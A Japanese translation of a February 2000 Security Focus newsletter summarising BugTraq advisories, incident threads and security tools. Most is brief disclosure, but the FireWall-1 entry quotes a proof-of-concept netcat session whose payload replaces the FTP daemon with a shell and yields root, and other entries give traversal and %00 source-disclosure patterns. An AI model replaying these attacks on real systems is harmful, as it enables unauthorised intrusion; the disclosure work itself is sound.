Security Focus Newsletter #28 2000-02-05 -> 2000-02-13
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
坂井@ラックです。
Security Focus Newsletter 第 28 号の和訳をお届けします。
訳のない項目については「日本語訳なし」として区別してあります。
Security Focus Newsletter に関するFAQ:
<URL: http://www.securityfocus.com/forums/sf-news/faq.html>
BugTraq-JP に関する FAQ:
<URL: http://www.securityfocus.com/forums/bugtraq-jp/faq.html>
- -----------------------------------------------------------------------
- -----------------------------------------------------------------------
引用に関する備考:
・この和訳は Security Focus の許可を株式会社ラックが得た上で行われて
います。
・Security Focus Newsletter の和訳を Netnews, Mailinglist,
World Wide Web, 書籍, その他の記録媒体で引用される場合にはメールの
全文引用をお願いします。
・日本語版ニュースレター 1 号から 3 号までにはこの備考が付いていませ
んが準用するものとします。
・また、Security Focus 提供の BugTraq-JP アーカイブ [*1] へのいかなる
形式のハイパーリンクも上記に準じてください。
1) <URL http://www.securityfocus.com/templates/archive.pike?list=79>
- -----------------------------------------------------------------------
- -----------------------------------------------------------------------
この和訳に関する備考:
・この和訳の適用成果について株式会社ラックは責任を負わないものとしま
す。
- -----------------------------------------------------------------------
- -----------------------------------------------------------------------
Security Focus Newsletter 第 28 号
目次:
Netegrity 社のご提供による Security Focus がお送りする週刊ニューズレター
の第 28 号へようこそ。
http://www.netegrity.com/web_seminar/
I. 初めに
1. DoD-Certified Trusted Systems And You.
2. Are you a security consultant or security product reseller?
II. 今週の BUGTRAQ から
1. Axis 700 Authentication Bypass Vulnerability
2. Novell GroupWise 5.5 Enhancement Pack DoS Vulnerability
3. SCO OpenServer SNMPD Default Community Vulnerability
4. MySQL Unauthenticated Remote Access Vulnerability
5. Zeus Web Server Null Terminated Strings Vulnerability
6. NT IIS ASP VBScript Runtime Error Viewable Source Vulnerability
7. Checkpoint FireWall-1 FTP Server Vulnerability
8. Internet Anywhere Mail Server Connection Overload Vulnerability
9. GNU make /tmp Vulnerability
10. Internet Anywhere Mail Server RETR DoS Vulnerability
III. パッチ情報
1. お知らせ
IV. Security Focus の上位6位の記事
1. Hackers Break Into Yahoo! (Mon Feb 7, 2000)
2. Hackers shut down Buy.com, too (Tues Feb 8, 2000)
3. Hackers on the Attack, Hitting Top Site (Tues Feb 8, 2000)
4. Attacks Cripple Popular Web Sites (Wed Feb 9, 2000)
5. Online bank: Lax security opened door for thieves (Thur Feb 9,
2000)
6. DoS: Defense is the Best Offense (Fri Feb 10, 2000)
V. 今週の INCIDENTS から
1. Helping or hacking (Was: Re: R: Re: Korea (was RE: ?)) (Thread)
2. DoS Trojan on Solaris (Thread)
3. stealth scans on old legacy firewalls. (Thread)
4. Compromised... (Thread)
5. Ping flood? Whats the point? (Thread)
6. Named "Response from unexpected source" (Thread)
7. Private networks and home.{net|com} (Thread)
8. Strange traceroute (Thread)
9. Why would the root servers be pinging me? (Thread)
10. Question about event log events (Thread)
11. vi as a suid (Thread)
12. echo requests, 1480 bytes (Thread)
13. Possible stacheldraht variant/probe (Thread)
14. Prank phone calls related to recent break-ins? (Thread)
15. [UPDATE]Dos Trojan on Solaris (Thread)
16. DDoS (Thread)
17. port 20056 (Thread)
18. E-Mail relay or break in? (fwd) (Thread)
20. Ports 41508, 41524 & 41531 (Thread)
21. a very strange scan (Thread)
22. SSH2 Exploit? (Thread)
23. Port 34545 (Thread)
24. sendmail vunerability ? (Thread)
25. DNS update queries: another sort of suspicious activity.
(Thread)
26. Strange ping reply packets (Thread)
27. Recent DDoS (Thread)
28. massive unapproved AXFR's and odd rcvd NOTIFY's (Thread)
VI. 今週の VULN-DEV RESEARCH LIST から
1. Re how to transfer files via napster (Thread)
2. fooling hubs [ARP Spoofing] (Thread)
3. FW: BIND version 9.0.0 Beta 1 Available (Thread)
4. Simple logging utility app (Thread)
5. Notes Domino Server Platform for e-commerce? (Thread)
6. Breaking through FTP ALGs -- is it possible? (Thread)
7. recursion (Thread)
8. FireWall-1 FTP Server Vulnerability (Thread)
9. Another, but slightly different browser crash...well kind of
(Thread)
10. Internic vulnerability (Thread)
11. Notes Domino Server Platform for e-commerce? (Thread)
12. MacOS 8 Web Sharing known problems? (Thread)
13. WINS attack? (Thread)
14. IE Java (Thread)
VII. 求人情報
VIII. セキュリティ調査
1. Do you trust E-Commerce sites enough to use your credit card
online?
IX. Security Focus が選ぶ上位6位のツール
1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
2. SecurityFocus.com Pager (Win95/98/NT)
3. Cold Fusion Scan 1.0 (Win95/98/NT)
4. floppyfw 1.0.1 (Linux)
5. Black Wolf's Picture Encoder 0.90.a (Win95/98/NT)
6. NTOMax 1.0 (NT)
I. 初めに
- ---------
1. DoD-Certified Trusted Systems And You.
Windows NT の C2 評価基準達成のアナウンスが行われた後、関連する業界内
では C2 の意味する点について、非常に多くの不満がささやかれました。
SecurityFocus の Microsoft Focus Area では Ben Malisow がこの規定が定
める所とその背景をお使いの Windows NT ネットワークへの影響と共に解説
しています。
詳しくはこちらをご覧ください:
http://www.securityfocus.com/focus/ms/nt/ntmain.html
2. Are you a security consultant or security product reseller?
ご自身がお勤めの会社がコンピュータセキュリティについてのコンサルティン
グサービスやセキュリティ製品の再販サービスを提供しているのなら、
SecurityFocus はサービス一覧を無料でご提供します。これは SecurityFocus
のスタッフによるベンダーデータベースの一部の提供形態を取っています。
このデータベースは 3 月に出荷が予定され、600 を越えるセキュリティコンサ
ルティングサービスの提供企業が含まれ、SecurityFocus の 200,000 を越える
利用者の皆様からあまねく検索可能です。
もし、ご自身の企業を登録なさりたい場合、企業一覧にバナー広告も登録可能
です。バナー広告は 234 x 60 ピクセルの IAB の半分の大きさのアニメーショ
ンを利用していない形式が利用可能です。
このサービスについてより詳細は以下の URL をご覧ください:
http://www.securityfocus.com/service/vendor.html
II. 今週の BUGTRAQ から 2000-02-05 から 2000-02-13 まで
- --------------------------------------------------------
1. Axis 700 Authentication Bypass Vulnerability
BugTraq ID: 971
リモートからの再現性: あり
公表日: 2000-02-07
関連するURL:
http://www.securityfocus.com/bid/971
パッチ情報: 発行日の時点ではパッチは提供されていません。
まとめ:
Axis 700 ネットワークスキャンサーバには管理とモニタリングの目的で小規模
な Web サーバが組み込まれている。この Web サーバの管理用のページへのア
クセスにはパスワードを使った保護機能が儲けられているが、この保護機能は
簡単に外すことができてしまうのである。このサーバは最終的な URL 変換前
要求された URL のパーミッションを確認する。
従って、target/nonrestricted/../restricted/ の様な URL を指定する事で
誰であってもアクセスが限定されているディレクトリ (この場合 restricted
ディレクトリ) へアクセスできてしまえるのだ。また、文字列の取り扱いも同
様に問題を抱え、いかなる URL 中の文字列も % でエスケープして与えられる
のである。
2. Novell GroupWise 5.5 Enhancement Pack DoS Vulnerability
BugTraq ID: 972
リモートからの再現性: あり
公表日: 2000-02-07
関連するURL:
http://www.securityfocus.com/bid/972
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=972
まとめ:
拡張パックがインストールされた Novell Groupwise 5.5 Web サーバへ長い URL
を与えることでサーバを機能停止状態に陥らせる事が可能である。この際、
java.nlm がすべての CPU 資源を使い果たしてしまうか、ポストオフィスサー
ビスを停止させてしまうのである。機能復旧のためには再起動が必要である。
3. SCO OpenServer SNMPD Default Community Vulnerability
BugTraq ID: 973
リモートからの再現性: あり
公表日: 2000-02-07
関連するURL:
http://www.securityfocus.com/bid/973
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=973
まとめ:
SCO 社の OpenServer 5.0.5 に含まれる Simple Network Management Protocol
(SNMP) デーモンのデフォルト設定には問題点がある。デフォルトでは private
というコミュニティ名が /etc/snmpd.comm に記録され、攻撃者はコミュニティに
書き込み権限を持つ事が可能である。従って、ルーティングテーブル、コネク
ションの機能停止、他の攻撃への踏み台が可能であり、結果として攻撃対象のコ
ンピュータの権限の取得が行われてしまう可能性がある。
4. MySQL Unauthenticated Remote Access Vulnerability
BugTraq ID: 975
リモートからの再現性: あり
公表日: 2000-02-08
関連するURL:
http://www.securityfocus.com/bid/975
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=975
まとめ:
MySQL で用いられているパスワード検証スキームには弱点がある。
この弱点とはコンピュータ上のすべてのデータベースに接続を許可されたユー
ザが実際にいかなるユーザ権限でもデータベースにアクセスできてしまえる事
である。既知のアカウント名とパスワードを入手する代わりに、攻撃者は正当
なアカウント名を知っているだけで良いのだ。3.22.26a 以上のバージョンが
この問題を抱えている。また、それ以前のバージョンについては未確認である
がより多くの問題を抱えている。
このソフトウェアの問題はサーバはクライアントから帰ってきた文字列を正し
い長さで使われているかの確認なしでサーバが使っているために生じる。
while (*scrambled)
{
if (*scrambled++ != (char) (*to++ ^ extra))
return 1; /* おかしいパスワード */
}
変数 scrambled はクライアントから返される文字列である。変数 scrambled
に 1 文字だけをユーザが返した場合、期待されるパスワードとは 1 文字が比
較されるだけである。この、たった 1 文字だけが対象と合致する場合に MySQL
はユーザ認証を通してしまうのである。そしてデータベースへのアクセスを許可
してしまうのである。この問題を指摘した投稿者によると、データベースへの
アクセスは 32 回の試行で許されてしまったそうである。
5. Zeus Web Server Null Terminated Strings Vulnerability
BugTraq ID: 977
リモートからの再現性: あり
公表日: 2000-02-08
関連するURL:
http://www.securityfocus.com/bid/977
パッチ情報:
http://www.securityfocus.com/configtabs/s/|FFFFFF/solution.gif
まとめ:
"%00" を CGI プログラム名の後に付けてリモートクライアントからアクセスす
る事により、スクリプトの中身を見てしまうことが可能である。これは CGI モ
ジュールオプションで "allow CGIs anywhere" が有効になっている場合に生じ
る。予め実行されるべきディレクトリ (例えば \cgi-bin) にプログラムがある
場合にはこの弱点の影響を受けない。
6. NT IIS ASP VBScript Runtime Error Viewable Source Vulnerability
BugTraq ID: 978
リモートからの再現性: あり
公表日: 2000-02-09
関連するURL:
http://www.securityfocus.com/bid/978
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=978
まとめ:
Active Server Page が .asp ファイルを生成する際に include されたファイ
ルのパス情報をブラウザへ ASP がエラーを返す際、 ASP のコンポーネントが
エラーメッセージを返す際に一緒に渡してしまう弱点がある。
include されるファイルはダウンロード可能であり、リソースの場所や Web
サイトやネットワークの構造やビジネスモデルといった重要な情報を含んでい
る。
他の重要な情報を入手できる方法は、似たような不注意な .asp ページがサー
チエンジンでインデックス化され、攻撃者が Microsoft VBScript runtime error
という文字列を使って探した場合、弱点を含むページを探し出せてしまえると
いうものである。
しかし、ASPのコードが修正された後であっても、サーチエンジンに残るキャッ
シュの関連する文書からから攻撃者は重要な情報を取り出せてしまえる場合も
ある。
なお、注意深く実装され、監査された ASP はこの弱点の影響を受けない。
7. Checkpoint FireWall-1 FTP Server Vulnerability
BugTraq ID: 979
リモートからの再現性: あり
公表日: 2000-02-09
関連するURL:
http://www.securityfocus.com/bid/979
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=979
まとめ:
Checkpoint 社の FireWall-1 の FTP サーバから FTP クライアントへパケット
を転送する機能には弱点がある。攻撃者はこの弱点を突き、FireWall-1 の内側
にあるいかなるマシンともコネクションを張れ、FireWall-1 で保護されている
ネットワークへパケットを送り出せてしまう。
FireWall-1 は FTP サーバからクライアントへのパケットをモニターし、パケッ
トの初めに 227 という文字列があるかどうかを探している。FireWall-1 が該
当する文字列を探せ出せた場合、到着先のアドレスとポート番号を FireWall-1
はパケットから取り出し、指定された到着先がパケットのソースとマッチするか
を検証する。それからファイヤウォール越しの TCP 接続の到着先の IP とポー
トへ向けて接続許可を与えるのである。
FireWall-1 4.0 において、TCP 接続は1つの宛先に対してのみ可能である。
しかし 3.0 以前のバージョンにおいては TCP 接続の宛先制限はかけられてい
ないのである。また、付け加えるならば FireWall-1 4.0 では既知の TCP サー
ビス一覧で定義されたポートへはデータを送付できないようになっている。
この弱点について John McDonald <jm@dataprotect.com> の投稿は以下の様に
伝えている。
「この技法を用いた攻撃例を以下に示す。FireWall-1 が gunmpe というホス
ト名のコンピュータと 172.16.0.2 の IP を持つ FTP サーバの間に設置され、
FTP サーバへ到着する FTP 接続だけを FireWall-1 は許可しているという場
合を仮定する。また、172.16.0.2 はデフォルトインストール状態の Solaris
2.6 であり、 Tooltalk データベースに関する問題を未対策のままとする。
この場合、対応するポートはファイヤウォールによってブロックされているに
もかかわらず、データグラムを FTP サーバの TCP ポートへ投げられるのであ
る。なお、この場合データグラムに関する応答は要求されておらず、一方向で
のアクセス制限はこの攻撃方法に影響を与えない。
この検証は FW-1 version 4.0 SP-4 が動作する Nokia IPSO 上で行った。
[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f
/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)
Solaris に付属する FTP デーモンがバウンス攻撃 (a bounce attack) を受け
てしまうため類似の攻撃が例示した設定条件では行える。しかし、この例はこ
の問題の想定される影響範囲を示すものである。」
まとめるならば、ネットワーク上に FTP サーバが FireWall-1 越しに設置さ
れ、外部からのアクセスを許可している場合には攻撃者は TCP コネクション
を FTP サーバ上の特定のポートとの間で張れてしまえる、という事である。
8. Internet Anywhere Mail Server Connection Overload Vulnerability
BugTraq ID: 980
リモートからの再現性: あり
公表日: 2000-02-10
関連するURL:
http://www.securityfocus.com/bid/980
パッチ情報: 発行日の時点ではパッチは提供されていません。
まとめ:
Internet Anywhere Mail Server の 25番ポートへ約 3000 個の連続したコネク
ションを張った場合、ユーザは接続不能というエラーメッセージを返される。
さらに約 800 個のコネクションが張られた場合、サーバは停止してしまう。
9. GNU make /tmp Vulnerability
BugTraq ID: 981
リモートからの再現性: なし
公表日: 2000-02-09
関連するURL:
http://www.securityfocus.com/bid/981
パッチ情報:
http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=981
まとめ:
GNU make が標準入力から Makefile の内容を受け付ける方法には弱点がある。
GNU make は /tmp に一時ファイルを作成するが、既存かどうか、シンボリック
リンクかどうかの確認は行っていない。従って、攻撃者は受け付けられてしまう
名前の一時ファイルをシンボリックリンクで作成し、ファイルシステム上の別の
場所を指し示せてしまえるのである。これを言い換えるならば、攻撃者は make
を実行しているユーザで所有されるファイルを作成できてしまえるのである。
もし、make を実行しているユーザが root ならば root 権限の入手が可能であ
る。
10. Internet Anywhere Mail Server RETR DoS Vulnerability
BugTraq ID: 982
リモートからの再現性: あり
公表日: 2000-02-10
関連するURL:
http://www.securityfocus.com/bid/982
パッチ情報: 発行日の時点ではパッチは提供されていません。
まとめ:
10 個を越える数字を Message ID 引数として RETR コマンドに与えることで
Internet Anywhere Mail Server をクラッシュさせる事が可能である。
ワトソン博士が MailServer.exe のアクセス違反を報告する。メールサーバを
再起動することで機能復旧が可能である。この DoS 攻撃は他のプログラムには
影響を与えない。また、この攻撃には攻撃者が POP3 サーバ用の正しいユーザ
名とパスワードを入手していることが必須である。
III`. パッチ情報 2000-02-05 から 2000-02-13 まで
- ------------------------------------------------
1. お知らせ
ニューズレターの構成見直しにより、この項目の情報は「今週の Bugtraq」の
「まとめ」で紹介いたします。
IV. Security Focus の上位6位の記事
- ----------------------------------
1. Hackers Break Into Yahoo! (Mon Feb 7, 2000)
関連するURL:
http://www.cnn.com/2000/TECH/computing/02/08/yahoo.ap/index.html
2. Hackers shut down Buy.com, too (Tues Feb 8, 2000)
関連するURL:
http://www.msnbc.com/news/367495.asp
3. Hackers on the Attack, Hitting Top Site (Tues Feb 8, 2000)
関連するURL:
http://www.foxnews.com/vtech/0209/t_rt_0209_1.sml
4. Attacks Cripple Popular Web Sites (Wed Feb 9, 2000)
関連するURL:
http://www.internetnews.com/bus-news/article/0,1087,3_301881,00.html
5. Online bank: Lax security opened door for thieves (Thur Feb 9, 2000)
関連するURL:
http://www.computerworld.com/home/print.nsf/CWFlash/000208E782
6. DoS: Defense is the Best Offense (Fri Feb 10, 2000)
関連するURL:
http://www.wired.com/news/technology/0,1282,34230,00.html
V. 今週の INCIDENTS から 2000-02-05 から 2000-02-13 まで
- --------------------------------------------------------
1. Helping or hacking (Was: Re: R: Re: Korea (was RE: ?)) (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=Pine.GS4.4.21.0002051400350.5957-100000@roentgen
2. DoS Trojan on Solaris (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=00020507431100.02174@Data_surge.org
3. stealth scans on old legacy firewalls. (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=Pine.LNX.4.10.10002051838160.6069-100000@vipe.technion.ac.il
4. Compromised... (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=Pine.LNX.4.10.10002072306070.25904-100000@redhat1.mmaero.com
5. Ping flood? Whats the point? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=SIMEON.10002070920.E13429@bluebottle.itss
6. Named "Response from unexpected source" (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=200002081425.HAA11600@ncar.ucar.EDU
7. Private networks and home.{net|com} (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=200002081641.IAA11100@nimitz.ca.sandia.gov
8. Strange traceroute (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=20000208083110.A4132@sec.sprint.net
9. Why would the root servers be pinging me? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-1&thread=20000208023858.A9506@entire-systems.com
10. Question about event log events (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=012f01bf7278$48a750f0$ca0a000a@ackbar
11. vi as a suid (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=38A0998D.CB3E5D0B@nitnet.com.br
12. echo requests, 1480 bytes (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=200002091329.IAA18897@obelix.dgrc.crc.ca
13. Possible stacheldraht variant/probe (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=20000210004509.19417106FB@schadenfreude.meshuggeneh.net
14. Prank phone calls related to recent break-ins? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=Pine.LNX.4.10.10002091438100.10947-100000@enchanter.real-time.com
15. [UPDATE]Dos Trojan on Solaris (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=0bd201bf7361$592f0960$e20a7d80@usc.edu
16. DDoS (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=000f01bf7362$b630bd60$3d7c0718@intranetktwte6
17. port 20056 (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=004601bf7350$5aca5290$ca0a000a@ackbar
18. E-Mail relay or break in? (fwd) (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=Pine.GSO.4.10.10002092100540.1100-100000@www.securityfocus.com
20. Ports 41508, 41524 & 41531 (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=F523B264A19BD3118468009027DE3A1A015A6372@ukslms02.cai.com
21. a very strange scan (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=20000209162611.19357.qmail@securityfocus.com
22. SSH2 Exploit? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=NDBBLNDBEMLKIHJDBJCDKEDDCCAA.jonz@netrail.net
23. Port 34545 (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=20000209211944.18927.qmail@securityfocus.com
24. sendmail vunerability ? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=38A2E7F9.66164C08@secureaustin.com
25. DNS update queries: another sort of suspicious activity. (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=38A2E8D6.FA774262@secureaustin.com
26. Strange ping reply packets (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=3.0.6.32.20000210095204.00a1ce90@deviance.org
27. Recent DDoS (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=38A1EC7A.9F61C49F@relaygroup.com
28. massive unapproved AXFR's and odd rcvd NOTIFY's (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-02-8&thread=Pine.BSF.4.21.0002101220480.72962-100000@atlas.usls.edu
VI. 今週の VULN-DEV RESEARCH LIST から 2000-02-05 から 2000-02-13 まで
- ----------------------------------------------------------------------
1. Re how to transfer files via napster (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-1&thread=
2. fooling hubs [ARP Spoofing] (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-1&thread=389EC4AE.A1D17814@secureaustin.com
3. FW: BIND version 9.0.0 Beta 1 Available (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-1&thread=4036B8ED3AAED3118F9E00A0CC58F9F186AD@MAIL
4. Simple logging utility app (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-1&thread=Pine.LNX.4.20.0002071035210.1135-100000@noella.mindsec.com
5. Notes Domino Server Platform for e-commerce? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-1&thread=4125687E.0049BFA2.00@SRV_D_BO_K_1.ARAL.DE
6. Breaking through FTP ALGs -- is it possible? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=389FEB7B.AA290CC7@enternet.se
7. recursion (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=LPBBLNADHGKPALPMJLNNCEOPCAAA.blake@mc.net
8. FireWall-1 FTP Server Vulnerability (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=38A1B2D9.3B244FAB@dataprotect.com
9. Another, but slightly different browser crash...well kind of (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=79863A595377D311AA76009027469F3926D5B4@lytes1.sema.co.uk
10. Internic vulnerability (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=02f101bf73d9$726b10e0$ec1c10ac@cwcipapps.net
11. Notes Domino Server Platform for e-commerce? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=38A2F905.C00514B3@wirex.com
12. MacOS 8 Web Sharing known problems? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=v04220806b4c9ece699a6@[10.108.3.15]
13. WINS attack? (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=38A48AA1.4D9311E8@f5.com
14. IE Java (Thread)
関連するURL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&thread=001c01bf75ac$ebb38a20$4e967ad4@gottt
VII. 求人情報 (日本語訳なし)
- -----------------------------
VIII. セキュリティ調査 2000-02-05 から 2000-02-13 まで
- -------------------------------------------------------
現在、以下の質問について調査を行っています。
「電子商取引を行っているサイトはご自身のクレジットカード情報をオンライ
ンで取り扱うだけの十分な体制にあるとお考えですか?」
はい 11% / 12 票
いいえ、決してない 20% / 22 票
よく知っているならば取り扱って構わない 49% / 52 票
50ドルまでなら取り扱って構わない 18% / 20 票
全投票数 106 票
IX. Security Focus が選ぶ上位6位のツール
2000-02-05 から 2000-02-13 まで
- -----------------------------------------
ShadowScan 1.00.093 (Windows 95/98 および Windows NT)
著者: RedShadow
関連するURL:
http://www.rsh.kiev.ua
Shadow Advantis Administator Tools - Ping (SSPing)、Port Scanner、IP
Scanner、Site Info (ターゲットで動作しているサービスの同定)、Network
Port Scanner、Tracert、Telnet、Nslookup、Finger、Echo、Time、UPD test
File Info、ファイル比較、Netstat、SysInfo、Crypt、ファイルの CRC、
DBF の参照と編集、DiskInfo、NTprocess、Keyboard テスト、DNS info
Shadow Hack and Crack - WinNuke、Mail Bomber、POP3・HTTP・SOCKS・FTPの
クラッキング(探査方法に従ったパスワードの同定)、Unix パスワードクラック、
sendmail 越しの finger、バッファオーバーフロー、SMP パスワードチェック、
CRK ファイル
ShadowPortGuard - 特定のポートへのコネクションの発見コード
Shadow Novell NetWare Crack - Novell NetWare 4.x 等のクラックツール
2. SecurityFocus.com Pager (Win95/98/NT)
著者: SecurityFocus.com
関連するURL:
http://www.securityfocus.com/pager/sf_pgr20.zip
このプログラムはユーザの皆様にブラウザを開き、コンテンツ内容を確認する
ことなしに Security Focus が提供する Web サイトに追加された項目を確認
できる環境を提供します。
バックグラウンドで控えながら、ユーザが指定した周期でコンテンツを確認し、
システムトレイ内の点滅するアイコン、ポップアップメッセージ、これらの両
方で変更をお知らせします。(通知方法は設定可能です)
3. Cold Fusion Scan 1.0 (Win95/98/NT)
著者: icos@arez.com
関連するURL:
http://www.securityfocus.com/data/tools/cfscan.zip
Cold Fusion vulnerability scanner はリストに挙げられたホスト、ドメイン
単位で動作し、Allaire Cold Fusion の誤設定を見つけ出す弱点調査用のプロ
グラムです。
4. floppyfw 1.0.1 (Linux)
著者: Thomas Lundquist, thomasez@zelow.no
関連するURL:
http://www.securityfocus.com/data/tools/floppyfw-1.0.1.img
http://www.zelow.no/floppyfw/
floppyfw はたった 1 枚のフロッピーディスクで動作するルータとシンプルな
ファイヤウォールソフトウェアです。このソフトウェアは Linux の基本的な
ファイヤウォール機能と非常にシンプルなパッケージ化機能を使っています。
このソフトウェアは ADSL とケーブルテレビ網を使ったインターネット接続で
固定 IP あるいは DHCP を使う場合にマスカレードやネットワークのセキュア
化にお使い頂けます。インストールは簡単でフロッピー内の 1 つのファイル
を変更するだけで済みます。
5. Black Wolf's Picture Encoder 0.90.a (Win95/98/NT)
著者: Black Wolf
関連するURL:
http://www.securityfocus.com/data/tools/stegodos.zip
Black Wolf が提供する Picture Encoder は DOS で動作するメッセージを
GIF あるいは PCX 画像形式に変換するプログラムです。これは現在、
320x200x256 画素でのみ動作します。
6. NTOMax 1.0 (NT)
著者: NT OBJECTives, info@ntobjectives.com
関連するURL:
http://www.securityfocus.com/data/tools/NTOMax10.zip
http://www.ntobjectives.com
NTOMaxはプログラム可能な、ネットワーク上で提供されているバッファへ負荷
を与えて試験を行うためのプログラムです。このツールはサーバ上の DoS 攻撃
をもたらすバッファオーバーフローを見つけ出す事を目的にしています。
Translated by SAKAI Yoriyuki / LAC <URL: http://www.lac.co.jp/>
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>
iQA/AwUBOKcTzJQwtHQKfXtrEQIbcwCfTC5wcri9DZprA9smwYRiYhXd130An2kF
5qZNmWJolc2y4T08b5VBiRMQ
=EhVD
-----END PGP SIGNATURE-----